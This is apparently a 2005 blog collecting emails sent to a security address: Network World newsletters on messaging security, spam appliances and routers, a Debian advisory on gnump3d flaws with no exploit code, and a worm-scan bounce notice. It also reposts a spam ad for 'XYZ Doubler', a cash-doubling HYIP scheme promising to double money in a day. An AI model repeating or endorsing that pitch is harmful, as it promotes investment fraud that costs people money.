Search This Blog

Tuesday, November 08, 2005

Check employees' home computers for threats to your network

NETWORK WORLD NEWSLETTER: MICHAEL OSTERMAN ON MESSAGING
11/08/05
Today's focus: Check employees' home computers for threats to
your network

Dear security.world@gmail.com,

In this issue:

* Lessons from across the pond
* Links related to Messaging
* Featured reader resource
_______________________________________________________________
This newsletter is sponsored by SunGard

When e-mail is down, you can pretty much count on the fact that
it won't be business as usual. Learn how to maintain access to
e-mail without missing a beat. And if regulatory compliance or
restoration is a top of mind concern--you'll be prepared.
http://www.fattail.com/redir/redirect.asp?CID=118769
_______________________________________________________________
INDUSTRY GROUP PLANS VOIP BEST PRACTICES

The potential threats to VoIP networks are many and include:
theft of service, spamming, intentional disruption of services,
number harvesting and more. An industry group is working toward
a best-practices document that will spell out for businesses how
to build secure VoIP networks using specific makes and models of
equipment. More:
http://www.fattail.com/redir/redirect.asp?CID=119269
_______________________________________________________________

Today's focus: Check employees' home computers for threats to
your network

By Michael Osterman

In late October, I had the privilege of participating at the
Message05 event in London, an event focused on the e-mail
industry in the U.K and beyond. One of the more interesting
parts of this conference was the roundtable discussions in which
vendors, IT managers and others were given 90 minutes to kick
around a variety of issues - the two I led were focused on
content security and e-mail hygiene. Here are a couple of the
more interesting takeaways from the conference:

* One of the U.K.'s largest employers recently experienced a
major incident that brought its e-mail system and the rest of
its network to a complete halt for three days. It took a full
four weeks for all of the servers to be patched. At the time of
the conference, the company's IT management still didn't know
what caused the outage - it could have been anything from an IM
worm to a virus brought in on a USB keychain device. The company
has spent enormous sums of money combating the effects of
whatever caused the outage and reinforcing its defenses to
prevent something else like this from happening again.

* When Volvo negotiates with security vendors for new systems,
the company requires that its employees are provided with the
same desktop capabilities for use at home. Volvo's thinking is
that because a lot of its employees do work from home, it's
critical to make sure that threats cannot enter the corporate
network by way of users' personal machines.

Both of these points illustrate the critical need for
organizations of all sizes to focus on a wide and growing array
of threats that could easily impact their networks. A single
piece of code, for example, one that could bring down a network
for days, can enter through an e-mail, an image file embedded in
an e-mail, a single IM, a USB keychain device, a diskette, an
employee's laptop, an employee's home machine, a contractor's
machine, an employee's child or any of a variety of other
sources. It is critical, therefore, to protect every avenue by
which a threat could enter a network, not just those in the
workplace.

The top 5: Today's most-read stories

_______________________________________________________________
To contact: Michael Osterman

Michael D. Osterman is the principal of Osterman Research
<http://www.ostermanresearch.com/>, a market research firm that
helps organizations understand the markets for messaging,
directory and related products and services. He can be reached
by clicking here <mailto:michael@ostermanresearch.com>
_______________________________________________________________
This newsletter is sponsored by SunGard

When e-mail is down, you can pretty much count on the fact that
it won't be business as usual. Learn how to maintain access to
e-mail without missing a beat. And if regulatory compliance or
restoration is a top of mind concern--you'll be prepared.
http://www.fattail.com/redir/redirect.asp?CID=118768
_______________________________________________________________
ARCHIVE LINKS

Archive of the Messaging newsletter:
http://www.networkworld.com/newsletters/gwm/index.html
_______________________________________________________________
FEATURED READER RESOURCE

WHO'S IN THE HOT SEAT?

Now available on NetworkWorld.com is Network World's Hot Seat
with John Gallant. Guests on the Hot Seat, which include vendor
executives and industry luminaries, give candid answers to
pointed questions. These 5-minute video clips are sure to keep
you informed and entertained. Click here to see who is in this
week's Hot Seat:

<http://www.networkworld.com/nlmsg10753>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Saturday, November 05, 2005

WBCSD groups Virus Alert

The following message sent by this account has violated system policy:

From: debian-firewall@lists.debian.org
To: leave-wbcsd-sl-21297b@group.wbcsd.org
Date: Sun, 06 Nov 2005 02:59:41 +0100
Subject: Mail Delivery (failure leave-wbcsd-sl-21297b@group.wbcsd.org)

The following violations were detected:

--- Scan information follows ---

Virus Name: W32.Netsky.P@mm
File Attachment: message.scr
Attachment Status: deleted

--
To UNSUBSCRIBE, email to debian-firewall-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Friday, November 04, 2005

Receive a FREE HYIP Script!


http://www.xyzdoubler.com/?tydog22

XYZ Doubler-Brand New Cash Doubler!
FOR LIMITED TIME ONLY RECEIVE A FREE E-GOLD HYIP SCRIPT WITH PURCHASE OF
$10 OR MORE!!

Need more e-gold/stormpay?

Get In Early While Its HOT!
Join this brand new cash doubler and double your money in 1 day!
A great way to earn some extra cash on the side!
Simple but brilliant way of doubling your investment!

http://www.xyzdoubler.com/?tydog22

--
To UNSUBSCRIBE, email to debian-firewall-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Barracuda targets anti-spam appliance at big enterprises

All the week's news and views about fighting spam, 11/04/05
_______________________________________________________________
This newsletter is sponsored by Altiris, Inc.
Proving the Value of IT: Reduce the Cost and Complexity of IT
Management

Register for this complimentary Webinar to learn how effective
implementation of lifecycle management can help IT reduce
operational costs, increase operational efficiencies and set the
foundation for future growth--all proof points for IT's value to
the company. Attendees may win an iPod nano! Click below to
register.
http://www.fattail.com/redir/redirect.asp?CID=119183
_______________________________________________________________
IS ONLINE BANKING SECURE?

The Federal Financial Institutions Examination Council (FFIEC )
said the industry needs to adopt more than just single-factor
authentication for online banking. The FFIEC says it considers
single-factor authentication alone "to be inadequate...." Will
online banking now require hardware tokens or biometrics? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118520
_______________________________________________________________

Network World's Anti-spam News Alert

Barracuda targets anti-spam appliance at big enterprises,
11/03/05

Barracuda earlier this week released a version of its Spam
Firewall e-mail security appliance for very large enterprises.
<http://www.networkworld.com/nlantispamnewsal10530>

Opinion: Blogging not all blah-blah-blah, 10/31/05

There's more happening with corporate blogs than the
career-threatening blunders that tend to grab headlines and
amuse us all.
<http://www.networkworld.com/nlantispamnewsal10531>

The top 5: Today's most-read stories

1. Cisco warns holes in IOS, WLAN and IPS gear
<http://www.networkworld.com/nlantispamnewsal10532>
2. Sprint, cable companies go for quadruple play
<http://www.networkworld.com/nlantispamnewsal10533>
3. Microsoft moves to add VoIP to Office
<http://www.networkworld.com/nlantispamnewsal10534>
4. AT&T: Fall of an icon
<http://www.networkworld.com/news/2005/103105-att.html?t5>
5. Cisco in space
<http://www.networkworld.com/nlantispamnewsal10535>

_______________________________________________________________
To contact:

Contact Online News Editor Jeff Caruso at
<mailto:jcaruso@nww.com>
_______________________________________________________________
This newsletter is sponsored by ProCurve Networking by HP
Network World Executive Guide: Compliance can be an opportunity
for Network Improvements

Federal regulations such as the Health Insurance Portability and
Accountability Act and the Sarbanes-Oxley Act are driving
increased corporate spending on key IT areas such as security,
authentication, access control and document management. Get
advice from experts. Read about real-world tactics. Learn about
the dark side of compliance: what happens when thing wrong.
And, how mandates are affecting IT budgets.
http://www.fattail.com/redir/redirect.asp?CID=118835
_______________________________________________________________
ARCHIVE LINKS

Spam/Phishing news page Latest anti-spam news, analysis and
newsletters http://www.networkworld.com/topics/spam.html
_______________________________________________________________
FEATURED READER RESOURCE

REVISTING SPYWARE

Spyware can kill your business quicker than spam or viruses.
Spyware insidiously logs your keystrokes, rifles through your
files for password and credit card data, peppers your screen
with ads and slows your PCs to a crawl. So how do you stop it?
Network World reviews 16 spyware stopping products. Click here:

<http://www.networkworld.com/nlantispamnewsal10536>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Wednesday, November 02, 2005

Mailbag: Fixed, mobile systems live together in harmony

NETWORK WORLD NEWSLETTER: STEVE TAYLOR AND LARRY HETTICK ON
CONVERGENCE
11/02/05
Today's focus: Mailbag: Fixed, mobile systems live together in
harmony

Dear security.world@gmail.com,

In this issue:

* Readers reply to fixed vs. mobile debate
* Links related to Convergence
* Featured reader resource
_______________________________________________________________
This newsletter is sponsored by Cisco Systems
Benefits of Cisco IP Communications in a Cisco Intelligent
Network

Organizations that chose the all-IP option face another choice:
whether to run IP Communications applications from one vendor on
a different vendor's infrastructure, or chose IP Communications
from the same vendor that built the infrastructure. This paper
highlights the features that customers gain when deploying Cisco
IP Communications in an intelligent Cisco IP network. It also
demonstrates the unique value that this systems approach
delivers.
http://www.fattail.com/redir/redirect.asp?CID=118728
_______________________________________________________________
SIGN UP FOR 51 FREE ISSUES OF NETWORK WORLD MAGAZINE

Everyone is talking about the convergence of voice and data onto
the same infrastructure. Convergence touches on virtually every
aspect of the network, from the call center to the wireless LAN.
Find out what Network World Editors have to say each week in our
print publication.
SUBSCRIBE NOW AT:
http://www.fattail.com/redir/redirect.asp?CID=118568
_______________________________________________________________

Today's focus: Mailbag: Fixed, mobile systems live together in
harmony

By Steve Taylor and Larry Hettick

Last week, we published a mock debate on the virtues of fixed
vs. mobile solutions
http://www.networkworld.com/nlconvergence9799. Today, we'd like
to share a few reader replies to our discussion.

First, we'll hear from David J. Green, senior Internet marketing
and security consultant at NetGreen Consulting. Green has
succinctly answered the debate with a matrix approach,
suggesting that wireline services (just barely) edge out
wireless solutions for enterprise applications.

He suggests that, "whoever can provide 'good enough' service
that is fast, cheap and easy to use will win."

Green's matrix is shown below, using a scale of 1-5 with 5 being
high:

Good enough: Wireless-3, Wireline-4
Fast: Wireless-2, Wireline-4
Cheap: Wireless-3, Wireline-2
Easy to use: Wireless-4 Wireline-3

Totals: Wireless-12 Wireline-13

Next, we hear from Madhusudhan Mendu, who states, "My opinion is
it all depends on the business need."

Mendu suggests that the both wireline and wireless services will
"complement each other." In one example, he notes that mobile
"backhaul still needs wireline connectivity" and that "end users
[still need] wireline broadband access." In another example, he
cites a sales representative's need for "mobile connectivity for
access to his CRM system on his mobile device while on the move"
vs. the "end user who requires larger screen/intense application
like IPTV [that] will choose wireline broadband access."

As a parallel, he asks: "Did watches replaced clocks?" or "Did
cell phones replace desk phones?" - concluding that in both
cases neither solution displaced the other, and that both
continue to exist as complementary solutions.

The top 5: Today's most-read stories

1. Vulnerable security algorithms raise concerns
http://www.networkworld.com/nlconvergence10163
2. Gates, Ozzie go 'Live' with Microsoft services plan
http://www.networkworld.com/nlconvergence10164
3. Telecom merger approvals get mixed reviews
http://www.networkworld.com/nlconvergence10165
4. AT&T: Fall of an icon
http://www.networkworld.com/news/2005/103105-att.html?t5
5. FCC okays telecom mergers with conditions
http://www.networkworld.com/nlconvergence10166

_______________________________________________________________
To contact: Steve Taylor and Larry Hettick

Steve Taylor is president of Distributed Networking Associates
and publisher/editor-in-chief of Webtorials. For more detailed
information on most of the topics discussed in this newsletter,
connect to Webtorials http://www.webtorials.com/, the premier
site for Web-based educational presentations, white papers, and
market research. Taylor can be reached at
mailto:taylor@webtorials.com

Larry Hettick is an industry veteran with more than 20 years of
experience in voice and data. He is Vice President for Telecom
Services and Infrastructure at Current Analysis, the leading
competitive response solutions company. He can be reached at
mailto:lhettick@currentanalysis.com
_______________________________________________________________
This newsletter is sponsored by Cisco Systems
Benefits of Cisco IP Communications in a Cisco Intelligent
Network

Organizations that chose the all-IP option face another choice:
whether to run IP Communications applications from one vendor on
a different vendor's infrastructure, or chose IP Communications
from the same vendor that built the infrastructure. This paper
highlights the features that customers gain when deploying Cisco
IP Communications in an intelligent Cisco IP network. It also
demonstrates the unique value that this systems approach
delivers.
http://www.fattail.com/redir/redirect.asp?CID=118727
_______________________________________________________________
ARCHIVE LINKS

Archives of the Convergence newsletter:
http://www.networkworld.com/newsletters/converg/index.html
_______________________________________________________________
FEATURED READER RESOURCE

REVISTING SPYWARE

Spyware can kill your business quicker than spam or viruses.
Spyware insidiously logs your keystrokes, rifles through your
files for password and credit card data, peppers your screen
with ads and slows your PCs to a crawl. So how do you stop it?
Network World reviews 16 spyware stopping products. Click here:

http://www.networkworld.com/nlconvergence10167
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
http://www.nwwsubscribe.com/Changes.aspx

To change your e-mail address, go to:
http://www.nwwsubscribe.com/ChangeMail.aspx

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: mailto:jcaruso@nww.com

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: mailto:sponsorships@nwfusion.com

Copyright Network World, Inc., 2005

Tasman aims at beating Cisco with lower-cost router

 

All the week's Cisco news and analysis, 11/02/05


This newsletter is sponsored by Lancope

Discover the security benefits of NetFlow
Learn how Cisco NetFlow enables cost-effective security across distributed enterprise networks. StealthWatch, the Network Behavior Anomaly Detection solution, leverages NetFlow to offer Infrastructure IPS and provide real-time intelligence about network operations and devices to cost-effectively identify, prioritize and control network behavior. Click here to download ?Enterprise Network Security Doesn?t End with IPS? Whitepaper and discover the security benefits of NetFlow.


IS ONLINE BANKING SECURE?
The Federal Financial Institutions Examination Council (FFIEC) said the industry needs to adopt more than just single-factor authentication for online banking. The FFIEC says it considers single-factor authentication alone "to be inadequate...." Will online banking now require hardware tokens or biometrics? Click here for more.


Network World's Cisco News Alert

Tasman aims at beating Cisco with lower-cost router, 10/31/05

Tasman Networks this week will debut a router line aimed at matching Cisco's Integrated Services Routers on performance and beating them on price.

The top 5: Today's most-read stories

1. Vulnerable security algorithms raise concerns
2. Gates, Ozzie go 'Live' with Microsoft services plan
3. Telecom merger approvals get mixed reviews
4. AT&T: Fall of an icon
5. FCC okays telecom mergers with conditions


To contact:

Senior Editor Phil Hochmuth covers Cisco for Network World. Reach him at phochmuth@nww.com.


This newsletter is sponsored by Lancope

Discover the security benefits of NetFlow
Learn how Cisco NetFlow enables cost-effective security across distributed enterprise networks. StealthWatch, the Network Behavior Anomaly Detection solution, leverages NetFlow to offer Infrastructure IPS and provide real-time intelligence about network operations and devices to cost-effectively identify, prioritize and control network behavior. Click here to download ?Enterprise Network Security Doesn?t End with IPS? Whitepaper and discover the security benefits of NetFlow.


ARCHIVE LINKS


FEATURED READER RESOURCE

IT PROS SHARE THEIR TALES OF MAKING ITIL WORK
Running an enterprise network is challenging. IT organizational change can be even more so if managers don't balance efforts proportionally across people, process and technology. Implementing best practices frameworks such as Information Technology Infrastructure Library (ITIL) can help, but they introduce their own set of challenges. Click here for more:


COMPLIMENTARY SUBSCRIPTIONS AVAILABLE
Sign up today and receive 51 issues of Network World Magazine - At no cost

International Subscribers click here


SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail newsletters, click here.

To unsubscribe from promotional e-mail, click here.

To change your e-mail address, click here.

Subscription questions? Contact Customer Service by replying to this message.

This message was sent to: security.world@gmail.com. Please use this address when modifying your subscription.


Have editorial comments? Write Jeff Caruso, Newsletter Editor, at: jcaruso@nww.com

Inquiries to: NL Customer Service, Network World, Inc., 118 Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of Online Development, at: sponsorships@nwfusion.com

Copyright Network World, Inc., 2005

Vulnerable security algorithms raise concerns

All the week's news and views about Security, 11/02/05


This newsletter is sponsored by ConSentry

Implement Network Access Controls without a costly Network Upgrade
The ConSentry Secure LAN Controller enables organizations to enact strict network access controls plus enforce network use policies on a per user or per application basis for a more secure LAN without the complexity and the cost of switch upgrades. Click
here for more information.


IS ONLINE BANKING SECURE?
The Federal Financial Institutions Examination Council (FFIEC) said the industry needs to adopt more than just single-factor authentication for online banking. The FFIEC says it considers single-factor authentication alone "to be inadequate...." Will online banking now require hardware tokens or biometrics? Click
here for more.


Network World's Security News Alert

Vulnerable security algorithms raise concerns, 11/01/05
Industry experts agree that the future of two widely used security algorithms is fated, but with no clear alternatives in sight products that rely on them may have to remain "good enough" for some time.

Worm with rootkit hits AOL chat service, 11/01/05
Links leading to a worm that eventually implants a nasty rootkit on a user's computer are popping up on America Online's (AOL's) Instant Messenger network, security researchers are reporting.

Sourcefire may resurrect Check Point, 10/31/05
Sourcefire has products, but they're missing pieces - things that Check Point does very well. And Sourcefire can certainly benefit from the mature marketing, distribution, quality assurance and support infrastructure of an established company such as ...

The scary side of recycling hard drives, 10/31/05
I had been generally aware that far too many disks that government agencies, enterprises and individuals sell or trade in when upgrading their systems still contain valuable information, but I did not know the extent of the problem.

Spyware: Risky Business?, 10/31/05
The security industry has had a hard time even defining "spyware," much less stamping it out. All manner of annoying adware and malicious programs, such as keyloggers and botnets, are getting crammed into the single term "spyware." But a group called ...

Anti spyware in Vista, 10/31/05
If you are keeping score on what is in and what is out of Microsoft's Vista operating system (and for the record Microsoft says the feature list is not set) the newest addition in anti-spyware, the now standalone tool Microsoft got in its acquisition ...

Start-up takes aim at online prevention, 10/31/05
Business Signatures last week unveiled software aimed at helping financial institutions curb online fraud.

The top 5: Today's most-read stories

1. Vulnerable security algorithms raise concerns
2.
Gates, Ozzie go 'Live' with Microsoft services plan
3.
Telecom merger approvals get mixed reviews
4.
AT&T: Fall of an icon
5.
FCC okays telecom mergers with conditions


To contact:

Senior Editor Ellen Messmer covers security for Network World. Contact her at emessmer@nww.com.


This newsletter is sponsored by ConSentry

Implement Network Access Controls without a costly Network Upgrade
The ConSentry Secure LAN Controller enables organizations to enact strict network access controls plus enforce network use policies on a per user or per application basis for a more secure LAN without the complexity and the cost of switch upgrades. Click
here for more information.


ARCHIVE LINKS


FEATURED READER RESOURCE

IT PROS SHARE THEIR TALES OF MAKING ITIL WORK
Running an enterprise network is challenging. IT organizational change can be even more so if managers don't balance efforts proportionally across people, process and technology. Implementing best practices frameworks such as Information Technology Infrastructure Library (ITIL) can help, but they introduce their own set of challenges. Click here for more:


COMPLIMENTARY SUBSCRIPTIONS AVAILABLE
Sign up today and receive 51 issues of Network World Magazine - At no cost

International Subscribers click here


SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail newsletters, click here.

To unsubscribe from promotional e-mail, click here.

To change your e-mail address, click here.

Subscription questions? Contact Customer Service by replying to this message.

This message was sent to: security.world@gmail.com. Please use this address when modifying your subscription.


Have editorial comments? Write Jeff Caruso, Newsletter Editor, at: jcaruso@nww.com

Inquiries to: NL Customer Service, Network World, Inc., 118 Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of Online Development, at: sponsorships@nwfusion.com

Copyright Network World, Inc., 2005

Friday, October 28, 2005

[SECURITY] [DSA 877-1] New gnump3d packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 877-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
October 28th, 2005 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : gnump3d
Vulnerability : cross-site scripting, directory traversal
Problem type : remote
Debian-specific: no
CVE ID : CVE-2005-3122 CVE-2005-3123

Steve Kemp discovered two vulnerabilities in gnump3d, a streaming
server for MP3 and OGG files. The Common Vulnerabilities and
Exposures Project identifies the following problems:

CVE-2005-3122

The 404 error page does not strip malicious javascript content
from the resulting page, which would be executed in the victims
browser.

CVE-2005-3123

By using specially crafting URLs it is possible to read arbitary
files to which the user of the streaming server has access to.

The old stable distribution (woody) does not contain a gnump3d package.

For the stable distribution (sarge) these problems have been fixed in
version 2.9.3-1sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 2.9.6-1.

We recommend that you upgrade your gnump3d package.

Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.dsc
Size/MD5 checksum: 575 16114607fe426691518743a80a15deda
http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3.orig.tar.gz
Size/MD5 checksum: 616250 1a0d6a10f6ac2354e1f8c6000665f299
http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.diff.gz
Size/MD5 checksum: 14298 9fbb9305ab4282b7957be8203dd6fb35

Architecture independent components:

http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2_all.deb
Size/MD5 checksum: 603662 a94ff8504be400030a5f5fdb08987da0

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDYfRjW5ql+IAeqTIRAiSQAJ9J3KU5U/TV0XK6xPLNXlY8E9nhXgCeIKQI
KQjf5W+ekqi1NjEw71BXrLE=
=Je47
-----END PGP SIGNATURE-----

--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Thursday, October 27, 2005

Jupiter Webcast Invite: Valuing Web Page Real Estate




Register today for this upcoming Jupiter Webcast: 
Valuing Web Page Real Estate

November 14, 2005 -- 2:00pm EST / 11:00am PST

Registration is FREE for qualified attendees. This Webcast is sponsored by Omniture. For more information and to sign up today visit http://www.jupiterwebevents.com/webcasts/omniture_nov14.html

Speakers: 
Patti Freeman Evans, Analyst, JupiterResearch
Eric T. Peterson, Analyst, JupiterResearch

Retailers have long understood and measured the effectiveness of their physical square footage and their print catalog pages. This practice is very beneficial for understanding how to best monetize a Web site as well. 

In this Webcast, analysts Patti Freeman Evans and Eric Peterson will showcase recent research conducted by JupiterResearch that establishes a framework for valuing links, pages and paths within your Web site. 

Attend this Webcast and learn: 
- Insights from the offline catalogue and retail world that can be leveraged to 
  assign value to Web site pages and elements.
- Key factors behind Web site value and their impact.
- Best practices to use to evaluate and optimize Web site pages and elements for faster ROI. 

Registration is FREE for qualified attendees. To sign up visit http://cp.jupiterweb.com/index.php/1591_default/

Jupiter Webcasts are educational Web conferences focusing on IT and Internet related business issues. Each Webcast runs approximately 45 to 60 minutes in total, and integrates a PowerPoint presentation with audio. 

After registering for the event through our Web site, if you qualify you will receive an e-mail providing instructions on how to access the presentation prior to the event. 

This Webcast is sponsored by Omniture, Inc. Omniture is the pioneer of next-generation web analytics technology and is the most experienced provider of adaptable solutions to large, complex websites. For more information visit http://www.omniture.com

For additional information about sponsoring a Jupiter Webinar, 
please contact Mary Warley at webeventsales@jupitermedia.com 
or call 508-660-1404. 

If you wish to be removed from future Jupiter Webevents announcement mailings, please click here .

Jupitermedia Corporation * 23 Old Kings Highway South * Darien, CT * 06820

 

 

 

What is your preferred mode of communication?

NETWORK WORLD NEWSLETTER: MICHAEL OSTERMAN ON MESSAGING
10/27/05
Today's focus: What is your preferred mode of communication?

Dear security.world@gmail.com,

In this issue:

* Our personal communication policies
* Links related to Messaging
* Featured reader resource
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117977
_______________________________________________________________
USERS AWASH IN EMERGING WIRELESS OPTIONS

The days of simply giving traveling employees a cell phone for
talking and a laptop for dial-up data are long gone, replaced by
a complex landscape of overlapping choices. There are decisions
to be made regarding devices, carrier contracts, performance and
reach. How do you know which decisions are the right ones? Click
here for more:
http://www.fattail.com/redir/redirect.asp?CID=118166
_______________________________________________________________

Today's focus: What is your preferred mode of communication?

By Michael Osterman

Almost all of us have policies and preferences as they relate to
communications. For example, we don't want to be called at home
after a certain time of night or before a certain time in the
morning on weekdays; we may not want to be called during dinner
or during a Monday Night Football game, etc. We may also have
similar types of policies at work, even if those policies are
unstated, such as not wanting to be called by telephone when
working on a deadline that's less than an hour away.

I believe that these policies will ultimately result in the
convergence of workplace e-mail, instant messaging (IM), fax and
voice into a single communications hierarchy that is driven
largely by policies stored in an enterprise directory. Using
such a capability, you might come up with the following
policies:

* Office voice is my preferred mode of communication and IM is
  secondary between 8 a.m. and 5 p.m. unless my presence status is
  busy, then default to e-mail.

* Outside of these hours, IM is my preferred mode and e-mail is
  secondary unless my presence status is busy, then default to
  voice.

* If a problem is urgent and my IM status is away, my preference
  is cell.

Using a system like this would do two things. First, for
recipients it would allow them to receive communications using
the medium of their choice based on the time of day, their
presence status, how busy they are at a given time, etc. For
senders, it would free them from having to guess how recipients
want to be contacted or the most efficient way to contact them,
and it would free them from having to know all of the modes of
communication that a recipient has available to them. For
example, if all a sender knows is the recipient's e-mail
address, the directory would be able to send the message to any
device the user has available based on that user's preferences.

Some of these capabilities already exist in various forms, but I
believe that this type of hierarchy, driven primarily by
recipients of communications and not senders, will become the
norm. I'd appreciate your feedback on how useful this would be
or how ridiculous it sounds: Please drop me a line at
<mailto:michael@ostermanresearch.com>.

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlmsg9547>
2. How to respond to a security breach
<http://www.networkworld.com/nlmsg9756>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlmsg9548>
4. Cartoon of the Week <http://www.networkworld.com/nlmsg9549>

5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlmsg9757>

_______________________________________________________________
To contact: Michael Osterman

Michael D. Osterman is the principal of Osterman Research
<http://www.ostermanresearch.com/>, a market research firm that
helps organizations understand the markets for messaging,
directory and related products and services. He can be reached
by clicking here <mailto:michael@ostermanresearch.com>
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117976
_______________________________________________________________
ARCHIVE LINKS

Archive of the Messaging newsletter:
http://www.networkworld.com/newsletters/gwm/index.html
_______________________________________________________________
CASE STUDY WEBCAST: OfficeMax Takes Email Security to the Max

Much more than just a product showcase, this new webcast is an
in-depth examination of how an enterprise of 35,000 users on
three continents developed a corporate email defense strategy.
Tune in 24/7 and come away with proven solutions:
http://www.fattail.com/redir/redirect.asp?CID=118308
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
